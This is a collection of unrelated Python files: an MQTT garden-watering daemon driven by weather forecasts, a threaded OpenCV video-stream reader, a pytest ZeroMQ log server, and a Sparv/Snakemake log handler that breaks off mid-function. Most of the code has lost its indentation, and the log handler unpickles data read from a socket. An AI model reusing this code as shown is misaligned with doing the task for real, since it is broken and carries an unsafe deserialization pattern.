# Setup some global variables because I'm lazy
CFG = None
CRON_KILL = None
CRON_SKIP = None
CRON_THREAD = None
WATER_DURATION = None
WATER_KILL = None
WATER_START = None
WATER_THREAD = None
LOGGER = None
def cb_on_connect(client, userdata, flags, rc):
""" Connect to mqtt broker and subscribe to the bedwetter topic """
LOGGER.info("Connected to the mqtt broker")
client.subscribe(f'{CFG["bedwetter"]["mqtt_topic"]}/event/#')
if "schedule" in CFG["bedwetter"] and CFG["bedwetter"]["schedule"]:
global CRON_KILL
global CRON_SKIP
global CRON_THREAD
CRON_KILL = False
CRON_SKIP = False
CRON_THREAD = threading.Thread(
target=cron_check, args=(lambda: CRON_KILL, lambda: CRON_SKIP,)
)
CRON_THREAD.daemon = True
CRON_THREAD.start()
if not CRON_THREAD.is_alive():
LOGGER.error("Unable to start cron check process")
global WATER_KILL
global WATER_START
global WATER_THREAD
WATER_THREAD = threading.Thread(
target=water_check, args=(lambda: WATER_KILL, lambda: WATER_START,)
)
WATER_THREAD.daemon = True
WATER_THREAD.start()
if not WATER_THREAD.is_alive():
LOGGER.error("Unable to start water check process")
else:
LOGGER.info("Not starting cron check thread, cron time string is not set")
def cb_on_disconnect(client, userdata, rc):
""" Log when disconnected from the mqtt broker """
LOGGER.info("Disconnected from the mqtt broker")
# Kill CRON_THREAD if it is running, otherwise we'll end up with
# a new one on every reconnection to the mqtt broker
try:
if CRON_THREAD.is_alive():
LOGGER.info("Trying to kill cron check, this can take a few seconds")
global CRON_KILL
CRON_KILL = True
CRON_THREAD.join()
if WATER_THREAD.is_alive():
LOGGER.info("Trying to kill water check, this can take a few seconds")
global WATER_KILL
WATER_KILL = True
WATER_THREAD.join()
except NameError:
pass
def cb_on_message(client, userdata, msg):
""" On receipt of a message, do stuff """
if "event/wateringStart" in msg.topic:
LOGGER.info("Received wateringStart mqtt message")
global WATER_DURATION
global WATER_START
if not msg.payload:
WATER_DURATION = CFG["bedwetter"].getint("watering_duration")
else:
WATER_DURATION = int(msg.payload)
WATER_START = True
elif "event/wateringSkip" in msg.topic:
LOGGER.info("Received wateringSkip mqtt message")
if CRON_THREAD.is_alive():
global CRON_SKIP
CRON_SKIP = True
LOGGER.info("Skipping next automated watering")
elif "event/wateringStop" in msg.topic:
# This won't actually interrupt water_on() which blocks the read loop
LOGGER.info("Received wateringStop mqtt message")
global WATER_KILL
WATER_KILL = True
def check_if_watering():
""" Check if we should water today, and if so water """
LOGGER.info("Checking if we're going to water today.")
water = False
if (int(time()) - int(CFG["bedwetter"]["last_water"])) > (
86400 * int(CFG["bedwetter"]["threshold_days"])
):
LOGGER.info(
"More than %s days since last watering, time to water",
CFG["bedwetter"]["threshold_days"],
)
water = True
else:
forecast = fetch_forecast()["forecast"]["daily"]
for day in forecast:
if day["day_num"] == int(strftime("%d")) and day[
"precip_probability"
] < CFG["bedwetter"].getint("threshold_percent"):
LOGGER.info(
"%s%% chance of precipitation in the next day, time to water",
f'{day["precip_probability"]:.0f}',
)
water = True
if water:
publish(
"event/wateringStart", CFG["bedwetter"].getint("water_duration"),
)
else:
log_and_publish(
"log/wateringSkipped",
"Not watering today",
CFG["bedwetter"].getboolean("notify_on_inaction"),
)
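# Worked example (illustrative values): with threshold_days = 3 and a
# last_water stamp from four days ago, the age check alone triggers a watering;
# otherwise a forecast precip_probability of 20% against threshold_percent = 50
# would also trigger one.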
def config_load():
""" Load configuration options from file """
global CFG
config_file = os.path.expanduser("~/.config/bedwetter/bedwetter.cfg")
CFG = ConfigParser()
CFG.read(config_file)
if "bedwetter" not in CFG:
sys.exit(f"Fatal Error: Unable to read from configuration file {config_file}")
def config_update():
""" Updates the config file with any changes that have been made """
config_file = os.path.expanduser("~/.config/bedwetter/bedwetter.cfg")
try:
with open(config_file, "w") as cfg_handle:
CFG.write(cfg_handle)
except EnvironmentError:
log_and_publish(
"log/wateringFailure",
"Could not write to configuration file {config_file}",
CFG["bedwetter"].getboolean("notify_on_failure"),
)
def create_paho_client():
""" Setup and create a Paho client """
# Paho is not thread safe, so we'll end up making a few clients
paho_client = mqtt_client.Client()
paho_client.tls_set(
ca_certs=f"{os.path.dirname(__file__)}/ssl/letsencrypt-root.pem"
)
paho_client.username_pw_set(
CFG["bedwetter"]["mqtt_username"], CFG["bedwetter"]["mqtt_password"],
)
return paho_client
def cron_check(kill, skip):
""" Poll until it is time to trigger a watering """
LOGGER.info(
"Started thread to water on schedule (%s)", CFG["bedwetter"]["schedule"]
)
cron = CronTab(f'{CFG["bedwetter"]["schedule"]}')
# The higher this value is, the longer it takes to kill this thread
sleep_interval = 10
while True:
if kill():
LOGGER.info("Received kill signal, killing cron check thread")
break
time_until_cron = cron.next(default_utc=False)
if CFG["bedwetter"].getboolean("debug"):
LOGGER.debug("Time until cron: %s seconds", int(time_until_cron))
if time_until_cron <= sleep_interval:
# Sleep until it's closer to cron time to avoid a possible race
sleep(time_until_cron)
if not skip():
check_if_watering()
else:
global CRON_SKIP
CRON_SKIP = False
log_and_publish(
"log/wateringSkipped",
"Watering skipped",
CFG["bedwetter"].getboolean("notify_on_inaction"),
)
else:
sleep(sleep_interval)
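# The schedule option is assumed to be a standard five-field cron expression as
# accepted by crontab.CronTab, e.g. "0 6 * * *" to evaluate watering daily at
# 06:00 (cron.next(default_utc=False) measures against local time).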
def water_check(kill, start):
""" Poll until it is time to water """
LOGGER.info("Started thread to check for watering events")
# The higher this value is, the longer it takes to kill this thread
sleep_interval = 10
while True:
if kill():
LOGGER.info("Received kill signal, killing water check thread")
break
if start():
global WATER_START
WATER_START = False
LOGGER.info("Water on")
water_on(WATER_DURATION)
water_off()
else:
sleep(sleep_interval)
def fetch_forecast():
""" Fetch a weather forecast from WeatherFlow """
try:
weatherflow_url = (
"https://swd.weatherflow.com/swd/rest/better_forecast/"
f'?api_key={CFG["bedwetter"]["weatherflow_api_key"]}'
f'&station_id={CFG["bedwetter"]["station_id"]}'
)
request = requests.get(
weatherflow_url, timeout=int(CFG["bedwetter"]["timeout"])
)
request.encoding = "utf-8"
return request.json()
except requests.exceptions.ConnectTimeout:
log_and_publish(
"log/wateringFailure",
f'Error: WeatherFlow API timed out after {CFG["bedwetter"]["timeout"]} seconds',
CFG["bedwetter"].getboolean("notify_on_failure"),
)
except requests.exceptions.RequestException:
log_and_publish(
"log/wateringFailure",
"Error: There was an error connecting to the WeatherFlow API",
CFG["bedwetter"].getboolean("notify_on_failure"),
)
def log_and_publish(topic, payload, publish_message=True):
""" Log a message to the logger, and optionally publish to mqtt """
LOGGER.info(payload)
if publish_message:
publish(topic, payload)
def publish(topic, payload, retain=False):
""" Publish messages to mqtt """
client = create_paho_client()
try:
client.connect(
CFG["bedwetter"]["mqtt_server"],
port=CFG["bedwetter"].getint("mqtt_port"),
keepalive=60,
)
# Paho swallows exceptions so I doubt this even works
except Exception as paho_e:
LOGGER.info("Unable to connect to mqtt broker, %s", paho_e)
(return_code, _) = client.publish(
f'{CFG["bedwetter"]["mqtt_topic"]}/{topic}',
payload=payload,
qos=0,
retain=retain,
)
if return_code != 0:
LOGGER.error("Unable to publish message, return code is %s", return_code)
client.disconnect()
def setup_logger():
""" Setup logging to file and stdout """
# Setup date formatting
formatter = logging.Formatter(
"%(asctime)-15s %(levelname)s - %(message)s", datefmt="%b %d %H:%M:%S"
)
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
# Log to stdout
stream_handler = logging.StreamHandler(sys.stdout)
stream_handler.setFormatter(formatter)
logger.addHandler(stream_handler)
# Optionally log to file
if "log_file" in CFG["bedwetter"] and CFG["bedwetter"].getboolean("log_to_file"):
file_handler = logging.FileHandler(
os.path.expanduser(CFG["bedwetter"]["log_file"])
)
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
return logger
def water_off():
""" Stop watering """
try:
import automationhat
except ImportError:
import mock
automationhat = mock.Mock()
LOGGER.info("Turning water off")
automationhat.relay.one.off()
if not automationhat.relay.one.is_off():
log_and_publish(
"log/wateringRunaway", "Watering failed to stop",
)
def water_on(duration):
""" Start watering """
try:
import automationhat
except ImportError:
import mock
automationhat = mock.Mock()
LOGGER.info("Watering for %s seconds", duration)
automationhat.relay.one.on()
sleep(duration)
if automationhat.relay.one.is_on():
log_and_publish(
"log/wateringSuccess",
"Watering succeeded",
CFG["bedwetter"].getboolean("notify_on_success"),
)
# Log and retain the last watering date
CFG["bedwetter"]["last_water"] = f"{time():.0f}"
# Home Assistant is really picky about date formats, so no timestamp
publish("log/wateringDate", datetime.now(tzlocal()).isoformat(), True)
config_update()
else:
log_and_publish(
"log/wateringFailure",
"Watering failed to start",
CFG["bedwetter"].getboolean("notify_on_failure"),
)
def main():
""" Main """
# Load config file settings
config_load()
# Setup logging
global LOGGER
LOGGER = setup_logger()
# Create main thread mqtt client and setup callbacks
client = create_paho_client()
client.on_connect = cb_on_connect
client.on_disconnect = cb_on_disconnect
client.on_message = cb_on_message
if CFG["bedwetter"].getboolean("debug"):
# Enable Paho logging using standard logger interface
client.enable_logger(logger=LOGGER)
else:
# Requests shouldn't be so chatty if we're not in debug
logging.getLogger("requests").setLevel(logging.WARNING)
# Connect to mqtt broker
try:
client.connect(
CFG["bedwetter"]["mqtt_server"],
port=CFG["bedwetter"].getint("mqtt_port"),
keepalive=60,
)
# Paho swallows exceptions so I doubt this even works
except Exception as paho_e:
LOGGER.info("Unable to connect to mqtt broker, %s", paho_e)
log_and_publish(
"log/startingUp",
"Startup has completed",
CFG["bedwetter"].getboolean("notify_on_service"),
)
# Catch SIGTERM when being run non-interactively
def shutdown(*args):
log_and_publish(
"log/shuttingDown",
"Caught SIGTERM, shutting down",
CFG["bedwetter"].getboolean("notify_on_service"),
)
# Make sure water is off before we exit
water_off()
sys.exit(0)
signal.signal(signal.SIGTERM, shutdown)
try:
client.loop_forever()
except KeyboardInterrupt:
LOGGER.info("KeyboardInterrupt received, shutting down")
client.disconnect()
sys.exit(0)
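
def _example_watch_last_watering(host="localhost", port=1883, prefix="bedwetter"):
    """Hedged usage sketch (not part of the original script): subscribe to the
    retained wateringDate message with a plain paho-mqtt client. The host,
    port and topic prefix here are illustrative assumptions, not values read
    from CFG."""
    import paho.mqtt.client as mqtt

    def on_message(client, userdata, message):
        # The retained payload is the ISO-8601 timestamp published by water_on()
        print(message.topic, message.payload.decode())

    watcher = mqtt.Client()
    watcher.on_message = on_message
    watcher.connect(host, port=port, keepalive=60)
    watcher.subscribe(f"{prefix}/log/wateringDate")
    watcher.loop_forever()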
if __name__ == "__main__":
    if sys.version_info >= (3, 7):
        main()
    else:
        sys.exit("Fatal Error: This script requires Python 3.7 or greater")
|
video_stream.py
|
# Based on code from the excellent: PyImageSearch.com
from threading import Thread, Lock
import cv2
from loguru import logger
@logger.catch
class VideoStream:
"""Create a thread and read frames from video source.
If we can't find video on the hardware camera, try streamlink.
Keyword arguments:
src -- a camera or video, defaults to hardware-connected webcam (default 0)
fps -- (float) (default 30.0)
    streamlink_url -- (default https://www.twitch.tv/PistolPete2506)
streamlink_quality -- useful values include 'audio_only', '480p', 'best', 'worst' (default '480p')
"""
def __init__(self, src=0, fps=30.0, use_streamlink_backup=True, streamlink_url="https://www.twitch.tv/PistolPete2506", streamlink_quality='480p'):
"""Initialize the video camera stream and read the first frame from the stream to test it."""
logger.debug(f"Setting VideoStream to: {src}")
self.stream = cv2.VideoCapture(src)
(_ok, self.frame) = self.stream.read()
if not _ok:
logger.warning("No video input found using source")
logger.debug("Trying streamlink source...")
import streamlink
streams = streamlink.streams(streamlink_url)
if streams:
logger.debug(f"Streamlink found the following streams at {streamlink_url}\n\n{streams}\n")
stream_url = streams[streamlink_quality].to_url()
else:
raise VideoStreamError("No streams were available")
self.stream = cv2.VideoCapture(stream_url)
self.grabbed = None
self.thread = None
self.started = False
self.read_lock = Lock()
def __exit__(self, exc_type, exc_value, traceback):
self.stream.release()
def start(self):
"""Start the thread to read frames from the video stream."""
if self.started:
logger.warning("Thread already started!!")
return None
self.started = True
self.thread = Thread(target=self.update, args=())
self.thread.start()
return self
def update(self):
"""Keep looping infinitely until the thread is stopped."""
while self.started:
(grabbed, _frame) = self.stream.read()
self.read_lock.acquire()
self.grabbed, self.frame = grabbed, _frame
self.read_lock.release()
def read(self):
"""Return the most recently read frame."""
self.read_lock.acquire()
_frame = self.frame.copy()
self.read_lock.release()
return _frame
def stop(self):
"""Indicate that the thread should be stopped."""
self.started = False
self.thread.join()
class VideoStreamError(Exception):
pass
if __name__ == "__main__":
vs = VideoStream().start()
while True:
frame = vs.read()
cv2.imshow('Example Frame', frame)
if cv2.waitKey(1) == 27:
break
vs.stop()
cv2.destroyAllWindows()
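    # Hedged usage note (not part of the original demo): src may also be a
    # video file path or URL accepted by cv2.VideoCapture, e.g.
    #   vs = VideoStream(src="movie.mp4", fps=24.0).start()
    # and if that source yields no frames, the streamlink fallback above kicks in.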
|
log_server.py
|
"""
Log Server
==========
"""
import logging
import threading
import attr
import msgpack
import pytest
import zmq
from saltfactories.utils import platform
from saltfactories.utils import ports
from saltfactories.utils import time
log = logging.getLogger(__name__)
@attr.s(kw_only=True, slots=True, hash=True)
class LogServer:
log_host = attr.ib()
log_port = attr.ib()
log_level = attr.ib()
running_event = attr.ib(init=False, repr=False, hash=False)
sentinel_event = attr.ib(init=False, repr=False, hash=False)
process_queue_thread = attr.ib(init=False, repr=False, hash=False)
@log_host.default
def _default_log_host(self):
if platform.is_windows():
# Windows cannot bind to 0.0.0.0
return "127.0.0.1"
return "0.0.0.0"
@log_port.default
def _default_log_port(self):
return ports.get_unused_localhost_port()
def start(self):
log.info("%s starting...", self)
self.sentinel_event = threading.Event()
self.running_event = threading.Event()
self.process_queue_thread = threading.Thread(target=self.process_logs)
self.process_queue_thread.start()
# Wait for the thread to start
if self.running_event.wait(5) is not True: # pragma: no cover
self.running_event.clear()
raise RuntimeError("Failed to start the log server")
log.info("%s started", self)
def stop(self):
log.info("%s stopping...", self)
address = "tcp://{}:{}".format(self.log_host, self.log_port)
context = zmq.Context()
sender = context.socket(zmq.PUSH)
sender.connect(address)
try:
sender.send(msgpack.dumps(None))
log.debug("%s Sent sentinel to trigger log server shutdown", self)
if self.sentinel_event.wait(5) is not True: # pragma: no cover
log.warning(
"%s Failed to wait for the reception of the stop sentinel message. Stopping anyway.",
self,
)
finally:
sender.close(1000)
context.term()
        # Clear the running event so the log processing thread knows it should stop
self.running_event.clear()
log.info("%s Joining the logging server process thread", self)
self.process_queue_thread.join(7)
if not self.process_queue_thread.is_alive():
log.debug("%s Stopped", self)
else: # pragma: no cover
log.warning(
"%s The logging server thread is still running. Waiting a little longer...", self
)
self.process_queue_thread.join(5)
if not self.process_queue_thread.is_alive():
log.debug("%s Stopped", self)
else:
log.warning("%s The logging server thread is still running...", self)
def process_logs(self):
address = "tcp://{}:{}".format(self.log_host, self.log_port)
context = zmq.Context()
puller = context.socket(zmq.PULL)
exit_timeout_seconds = 5
exit_timeout = None
try:
puller.bind(address)
except zmq.ZMQError: # pragma: no cover
log.exception("%s Unable to bind to puller at %s", self, address)
return
try:
self.running_event.set()
while True:
if not self.running_event.is_set():
if exit_timeout is None:
log.debug(
"%s Waiting %d seconds to process any remaning log messages "
"before exiting...",
self,
exit_timeout_seconds,
)
exit_timeout = time.time() + exit_timeout_seconds
if time.time() >= exit_timeout:
log.debug(
"%s Unable to process remaining log messages in time. Exiting anyway.",
self,
)
break
try:
try:
msg = puller.recv(flags=zmq.NOBLOCK)
except zmq.ZMQError as exc:
if exc.errno != zmq.EAGAIN: # pragma: no cover
raise
time.sleep(0.25)
continue
if msgpack.version >= (0, 5, 2):
record_dict = msgpack.loads(msg, raw=False)
else: # pragma: no cover
record_dict = msgpack.loads(msg, encoding="utf-8")
if record_dict is None:
# A sentinel to stop processing the queue
log.info("%s Received the sentinel to shutdown", self)
self.sentinel_event.set()
break
try:
record_dict["message"]
except KeyError: # pragma: no cover
# This log record was msgpack dumped from Py2
for key, value in record_dict.copy().items():
skip_update = True
if isinstance(value, bytes):
value = value.decode("utf-8")
skip_update = False
if isinstance(key, bytes):
key = key.decode("utf-8")
skip_update = False
if skip_update is False:
record_dict[key] = value
# Just log everything, filtering will happen on the main process
# logging handlers
record = logging.makeLogRecord(record_dict)
logger = logging.getLogger(record.name)
logger.handle(record)
except (EOFError, KeyboardInterrupt, SystemExit): # pragma: no cover
break
except Exception as exc: # pragma: no cover pylint: disable=broad-except
log.warning(
"%s An exception occurred in the processing queue thread: %s",
self,
exc,
exc_info=True,
)
finally:
puller.close(1)
context.term()
log.debug("%s Process log thread terminated", self)
@pytest.hookimpl(trylast=True)
def pytest_configure(config):
# If PyTest has no logging configured, default to ERROR level
levels = [logging.ERROR]
logging_plugin = config.pluginmanager.get_plugin("logging-plugin")
try:
level = logging_plugin.log_cli_handler.level
if level is not None:
levels.append(level)
except AttributeError: # pragma: no cover
# PyTest CLI logging not configured
pass
try:
level = logging_plugin.log_file_level
if level is not None:
levels.append(level)
except AttributeError: # pragma: no cover
# PyTest Log File logging not configured
pass
if logging.NOTSET in levels:
# We don't want the NOTSET level on the levels
levels.pop(levels.index(logging.NOTSET))
log_level = logging.getLevelName(min(levels))
log_server = LogServer(log_level=log_level)
config.pluginmanager.register(log_server, "saltfactories-log-server")
@pytest.hookimpl(tryfirst=True)
def pytest_sessionstart(session):
log_server = session.config.pluginmanager.get_plugin("saltfactories-log-server")
log_server.start()
@pytest.hookimpl(trylast=True)
def pytest_sessionfinish(session):
log_server = session.config.pluginmanager.get_plugin("saltfactories-log-server")
log_server.stop()
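
def _example_emit_record(host="127.0.0.1", port=12345):
    """Hedged sketch (not part of the original module): push one log record to
    a running LogServer. The wire format mirrors what process_logs() expects,
    a msgpack-dumped dict of LogRecord attributes; host and port here are
    illustrative, use the server's actual log_host/log_port."""
    context = zmq.Context()
    sender = context.socket(zmq.PUSH)
    sender.connect("tcp://{}:{}".format(host, port))
    record = logging.LogRecord(
        name="example", level=logging.INFO, pathname=__file__, lineno=0,
        msg="hello from a test process", args=(), exc_info=None,
    )
    # Include the formatted "message" key so the receiver skips its Py2 path
    payload = dict(record.__dict__, message=record.getMessage())
    sender.send(msgpack.dumps(payload))
    sender.close(1000)
    context.term()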
|
log_handler.py
|
"""Handler for log messages, both from the logging library and from Snakemake."""
import datetime
import logging
import logging.handlers
import os
import pickle
import re
import socketserver
import struct
import threading
import time
from collections import defaultdict
from datetime import timedelta
from pathlib import Path
from typing import Optional
import rich.progress as progress
from rich.logging import RichHandler
from rich.text import Text
from snakemake import logger
from sparv.core import paths
from sparv.core.console import console
from sparv.util.misc import SparvErrorMessage
LOG_FORMAT = "%(asctime)s - %(name)s - %(levelname)s - %(message)s"
LOG_FORMAT_DEBUG = "%(asctime)s - %(name)s (%(process)d) - %(levelname)s - %(message)s"
DATE_FORMAT = "%Y-%m-%d %H:%M:%S"
TIME_FORMAT = "%H:%M:%S"
# Add internal logging level used for non-logging-related communication from child processes to log handler
INTERNAL = 100
logging.addLevelName(INTERNAL, "INTERNAL")
def export_dirs(self, dirs):
"""Send list of export dirs to log handler."""
if self.isEnabledFor(INTERNAL):
self._log(INTERNAL, "export_dirs", (), extra={"export_dirs": dirs})
# Add log function to logger
logging.export_dirs = export_dirs
logging.Logger.export_dirs = export_dirs
# Messages from the Sparv core
messages = {
"missing_configs": defaultdict(set),
"missing_binaries": defaultdict(set),
"missing_classes": defaultdict(set)
}
class LogRecordStreamHandler(socketserver.StreamRequestHandler):
"""Handler for streaming logging requests."""
def handle(self):
"""Handle multiple requests - each expected to be a 4-byte length followed by the LogRecord in pickle format."""
while True:
chunk = self.connection.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = self.connection.recv(slen)
while len(chunk) < slen:
chunk = chunk + self.connection.recv(slen - len(chunk))
obj = pickle.loads(chunk)
record = logging.makeLogRecord(obj)
self.handle_log_record(record)
@staticmethod
def handle_log_record(record):
"""Handle log record."""
sparv_logger = logging.getLogger("sparv_logging")
sparv_logger.handle(record)
class LogLevelCounterHandler(logging.Handler):
"""Handler that counts the number of log messages per log level."""
def __init__(self, count_dict, *args, **kwargs):
super().__init__(*args, **kwargs)
self.levelcount = count_dict
def emit(self, record):
"""Increment level counter for each log message."""
if record.levelno != INTERNAL:
self.levelcount[record.levelname] += 1
class FileHandlerWithDirCreation(logging.FileHandler):
"""FileHandler which creates necessary directories when the first log message is handled."""
def emit(self, record):
"""Emit a record and create necessary directories if needed."""
if self.stream is None:
os.makedirs(os.path.dirname(self.baseFilename), exist_ok=True)
super().emit(record)
class InternalFilter(logging.Filter):
"""Filter out internal log messages."""
def filter(self, record):
"""Filter out internal records."""
return record.levelno < INTERNAL
class InternalLogHandler(logging.Handler):
"""Handler for internal log messages."""
def __init__(self, export_dirs_list):
self.export_dirs_list = export_dirs_list
super().__init__()
def emit(self, record):
"""Handle log record."""
if record.msg == "export_dirs":
self.export_dirs_list.update(record.export_dirs)
class ModifiedRichHandler(RichHandler):
"""RichHandler modified to print names instead of paths."""
def emit(self, record: logging.LogRecord) -> None:
"""Replace path with name and call parent method."""
record.pathname = record.name
record.lineno = 0
super().emit(record)
class LogHandler:
"""Class providing a log handler for Snakemake."""
icon = "\U0001f426"
def __init__(self, progressbar=True, summary=False, log_level=None, log_file_level=None):
"""Initialize log handler.
Args:
progressbar: Set to False to disable progress bar. Enabled by default.
summary: Set to True to write a final summary (elapsed time). Disabled by default.
log_level: Log level for logging to stdout.
log_file_level: Log level for logging to file.
"""
self.use_progressbar = progressbar
self.show_summary = summary
self.log_level = log_level
self.log_file_level = log_file_level
self.log_filename = None
self.log_levelcount = defaultdict(int)
self.finished = False
self.handled_error = False
self.messages = defaultdict(list)
self.missing_configs_re = None
self.missing_binaries_re = None
self.missing_classes_re = None
self.export_dirs = set()
self.start_time = time.time()
self.jobs = {}
# Progress bar related variables
self.progress_mgr = None
self.exit = lambda *x: None
self.progress: Optional[progress.Progress] = None
self.bar: Optional[progress.TaskID] = None
self.last_percentage = 0
# Create a simple TCP socket-based logging receiver
tcpserver = socketserver.ThreadingTCPServer(("localhost", 0), RequestHandlerClass=LogRecordStreamHandler)
self.log_server = tcpserver.server_address
# Start a thread with the server
server_thread = threading.Thread(target=tcpserver.serve_forever)
server_thread.daemon = True # Exit the server thread when the main thread terminates
server_thread.start()
if not self.use_progressbar: # When using progress bar, we must wait until after the bar is initialized.
self.setup_loggers()
def setup_loggers(self):
"""Set up log handlers for logging to stdout and log file."""
if not self.log_level or not self.log_file_level:
return
sparv_logger = logging.getLogger("sparv_logging")
internal_filter = InternalFilter()
# stdout logger
stream_handler = ModifiedRichHandler(enable_link_path=False, console=console)
stream_handler.setLevel(self.log_level.upper())
stream_handler.addFilter(internal_filter)
log_format = "%(message)s" if stream_handler.level > logging.DEBUG else "(%(process)d) - %(message)s"
stream_handler.setFormatter(logging.Formatter(log_format, datefmt=TIME_FORMAT))
sparv_logger.addHandler(stream_handler)
# File logger
self.log_filename = "{}.log".format(datetime.datetime.now().strftime("%Y-%m-%d_%H.%M.%S.%f"))
file_handler = FileHandlerWithDirCreation(os.path.join(paths.log_dir, self.log_filename), mode="w",
encoding="UTF-8", delay=True)
file_handler.setLevel(self.log_file_level.upper())
file_handler.addFilter(internal_filter)
log_format = LOG_FORMAT if file_handler.level > logging.DEBUG else LOG_FORMAT_DEBUG
file_handler.setFormatter(logging.Formatter(log_format))
sparv_logger.addHandler(file_handler)
# Level counter
levelcount_handler = LogLevelCounterHandler(self.log_levelcount)
levelcount_handler.setLevel(logging.WARNING)
sparv_logger.addHandler(levelcount_handler)
# Internal log handler
internal_handler = InternalLogHandler(self.export_dirs)
internal_handler.setLevel(INTERNAL)
sparv_logger.addHandler(internal_handler)
def setup_bar(self, total: int):
"""Initialize the progress bar."""
print()
self.progress_mgr = progress.Progress(
progress.TextColumn("[progress.description]{task.description}"),
progress.BarColumn(),
progress.TextColumn("[progress.percentage]{task.percentage:>3.0f}%"),
progress.TimeRemainingColumn(),
progress.TextColumn("{task.fields[text]}"),
console=console
)
self.exit = type(self.progress_mgr).__exit__
self.progress = type(self.progress_mgr).__enter__(self.progress_mgr)
self.bar = self.progress.add_task(self.icon, total=total, text="")
        # Logging needs to be set up after the bar, to make use of its print hook
self.setup_loggers()
@staticmethod
def info(msg):
"""Print info message."""
console.print(Text(msg, style="green"))
@staticmethod
def warning(msg):
"""Print warning message."""
console.print(Text(msg, style="yellow"))
@staticmethod
def error(msg):
"""Print error message."""
console.print(Text(msg, style="red"))
def log_handler(self, msg):
"""Log handler for Snakemake displaying a progress bar."""
def missing_config_message(source):
"""Create error message when config variables are missing."""
_variables = messages["missing_configs"][source]
_message = "The following config variable{} need{} to be set:\n • {}".format(
*("s", "") if len(_variables) > 1 else ("", "s"),
"\n • ".join(_variables))
self.messages["error"].append((source, _message))
def missing_binary_message(source):
"""Create error message when binaries are missing."""
_binaries = messages["missing_binaries"][source]
_message = "The following executable{} {} needed but could not be found:\n • {}".format(
*("s", "are") if len(_binaries) > 1 else ("", "is"),
"\n • ".join(_binaries))
self.messages["error"].append((source, _message))
def missing_class_message(source, classes=None):
"""Create error message when class variables are missing."""
_variables = messages["missing_classes"][source]
if not _variables:
_variables = classes
_message = "The following class{} need{} to be set:\n • {}".format(
*("es", "") if len(_variables) > 1 else ("", "s"),
"\n • ".join(_variables))
if "text" in _variables:
_message += "\n\nNote: The 'text' class can also be set using the configuration variable " \
"'import.document_annotation', but only if it refers to an annotation from the " \
"source files."
self.messages["error"].append((source, _message))
level = msg["level"]
if level == "run_info" and self.use_progressbar:
            # Parse the list of jobs to do and the total job count
lines = msg["msg"].splitlines()[2:]
total_jobs = lines[-1].strip()
self.jobs = {}
for j in lines[:-1]:
_, count, job = j.split("\t")
self.jobs[job.replace("::", ":")] = int(count)
if self.bar is None:
# Get number of jobs
if total_jobs.isdigit():
self.setup_bar(int(total_jobs))
elif level == "progress":
if self.use_progressbar:
# Set up progress bar if needed
if self.bar is None:
self.setup_bar(msg["total"])
# Advance progress
self.progress.advance(self.bar)
# Print regular updates if output is not a terminal (i.e. doesn't support the progress bar)
if not console.is_terminal:
percentage = (100 * msg["done"]) // msg["total"]
if percentage > self.last_percentage:
self.last_percentage = percentage
print(f"Progress: {percentage}%")
if msg["done"] == msg["total"]:
self.stop()
elif level == "job_info" and self.use_progressbar:
if msg["msg"] and self.bar is not None:
# Update progress status message
self.progress.update(self.bar, text=msg["msg"])
elif level == "info":
if msg["msg"] == "Nothing to be done.":
self.info(msg["msg"])
elif level == "error":
handled = False
# SparvErrorMessage exception from pipeline core
if "SparvErrorMessage" in msg["msg"]:
# Parse error message
message = re.search(
r"{}([^\n]*)\n([^\n]*)\n(.*?){}".format(SparvErrorMessage.start_marker,
SparvErrorMessage.end_marker),
msg["msg"], flags=re.DOTALL)
if message:
module, function, error_message = message.groups()
error_source = ":".join((module, function)) if module and function else None
self.messages["error"].append((error_source, error_message))
handled = True
# Exit status 123 means a Sparv module raised a SparvErrorMessage exception
# The error message has already been logged so doesn't need to be printed again
elif "exit status 123" in msg["msg"] or ("SystemExit" in msg["msg"] and "123" in msg["msg"]):
handled = True
# Errors due to missing config variables or binaries leading to missing input files
elif "MissingInputException" in msg["msg"] or "MissingOutputException" in msg["msg"]:
msg_contents = re.search(r" for rule (\S+):\n(.+)", msg["msg"])
rule_name, filelist = msg_contents.groups()
rule_name = rule_name.replace("::", ":")
if self.missing_configs_re.search(filelist):
handled = True
missing_config_message(rule_name)
elif self.missing_binaries_re.search(filelist):
handled = True
missing_binary_message(rule_name)
elif self.missing_classes_re.search(filelist):
handled = True
missing_class_message(rule_name, self.missing_classes_re.findall(filelist))
# Unhandled errors
if not handled:
self.messages["unhandled_error"].append(msg)
else:
self.handled_error = True
elif level in ("warning", "job_error"):
# Save other errors and warnings for later
self.messages["unhandled_error"].append(msg)
elif level == "dag_debug" and "job" in msg:
# Create regular expressions for searching for missing config variables or binaries
if self.missing_configs_re is None:
all_configs = set([v for varlist in messages["missing_configs"].values() for v in varlist])
self.missing_configs_re = re.compile(r"\[({})]".format("|".join(all_configs)))
if self.missing_binaries_re is None:
all_binaries = set([b for binlist in messages["missing_binaries"].values() for b in binlist])
self.missing_binaries_re = re.compile(r"^({})$".format("|".join(all_binaries)), flags=re.MULTILINE)
if self.missing_classes_re is None:
all_classes = set([v for varlist in messages["missing_classes"].values() for v in varlist])
self.missing_classes_re = re.compile(r"<({})>".format("|".join(all_classes)))
# Check the rules selected for the current operation, and see if any is unusable due to missing configs
if msg["status"] == "selected":
job_name = str(msg["job"]).replace("::", ":")
if job_name in messages["missing_configs"]:
missing_config_message(job_name)
self.handled_error = True
# We need to stop Snakemake by raising an exception, and BrokenPipeError is the only exception
# not leading to a full traceback being printed (due to Snakemake's handling of exceptions)
raise BrokenPipeError()
def stop(self):
"""Stop the progress bar and output any error messages."""
# Make sure this is only run once
if not self.finished:
# Stop progress bar
if self.bar is not None:
# Add message about elapsed time
elapsed = round(time.time() - self.start_time)
self.progress.update(self.bar, text=f"Total time: {timedelta(seconds=elapsed)}")
# Stop bar
self.exit(self.progress_mgr, None, None, None)
self.finished = True
print()
# Execution failed but we handled the error
if self.handled_error:
# Print any collected core error messages
if self.messages["error"]:
self.error("Sparv exited with the following error message{}:".format(
"s" if len(self.messages) > 1 else ""))
for message in self.messages["error"]:
error_source, msg = message
error_source = f"[{error_source}]\n" if error_source else ""
self.error(f"\n{error_source}{msg}")
else:
# Errors from modules have already been logged, so notify user
self.error(
"Job execution failed. See log messages above or {} for details.".format(
os.path.join(paths.log_dir, self.log_filename)))
# Defer to Snakemake's default log handler for unhandled errors
elif self.messages["unhandled_error"]:
for error in self.messages["unhandled_error"]:
logger.text_handler(error)
elif self.export_dirs:
